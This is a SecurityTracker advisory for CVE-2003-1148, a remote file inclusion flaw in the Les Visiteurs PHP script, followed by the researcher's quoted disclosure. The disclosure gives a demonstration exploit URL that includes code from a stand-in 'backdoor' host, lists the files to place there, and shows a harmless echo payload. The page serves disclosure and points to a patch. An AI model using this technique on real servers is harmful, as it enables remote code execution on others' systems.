SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   Les Visiteurs Vendors:   phpinfo.net
Les Visiteurs Include File Error Lets Remote Users Execute Arbitrary Commands on the Target Server
SecurityTracker Alert ID:  1008011
SecurityTracker URL:  http://securitytracker.com/id/1008011
CVE Reference:   CVE-2003-1148   (Links to External Site)
Updated:  Oct 16 2006
Original Entry Date:  Oct 28 2003
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 2.0.1 and prior versions
Description:   An include file vulnerability was reported in the Les Visiteurs PHP-based script. A remote user can execute arbitary PHP code, including operating system commands, on the target system.

It is reported that the 'include/config.inc.php' and 'include/new-visitor.inc.php' files include some other files without validating the location of the included files. A remote user can create a specially crafted URL that will cause PHP code at a remote location to be included and executed by the target server.

A demonstration exploit URL is provided:

http://host/path/include/config.inc.php?lvc_include_dir=http://backdoor/

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target server. The code and commands will run with the privileges of the target web server.
Solution:   No vendor solution was available at the time of this entry. [Editor's note: The report indicates that the software is no longer maintained by the vendor.]

An unofficial patch is available at:

http://chezwam.net/main/publications/lesvisiteurs/

Cause:   Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Les Visiteurs v2.0.1 code injection vulnerability




Les Visiteurs is a great statistics script written in php.
It gives you some graphicals informations on visitors of
your website.

This script was distributed by phpinfo.net but is no more
maintained since a year.

---------
In this version severals unprotected includes can be found 
in files:

- include/config.inc.php
- include/new-visitor.inc.php

It is possible to include a php file from a backdoor server, 
and execute it on the target's server.
You just have to create on the backdoor srv these files:
- lang/<lang>.inc.php
- db/db_mysql.inc.php

fill one with something like:
<?
echo '<?
echo "<br><br>included from backdoor server :p<br>";
?>';
?>

and call an url as:
http://host/path/include/config.inc.php?lvc_include_dir=http://backdoor/
---------


Because the script is not maintained and will not be patched,
i make some tarballs with a patched version.

You will find it at this url:
http://chezwam.net/main/publications/lesvisiteurs/

Matthieu Peschaud
Epita - France

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2020, SecurityGlobal.net LLC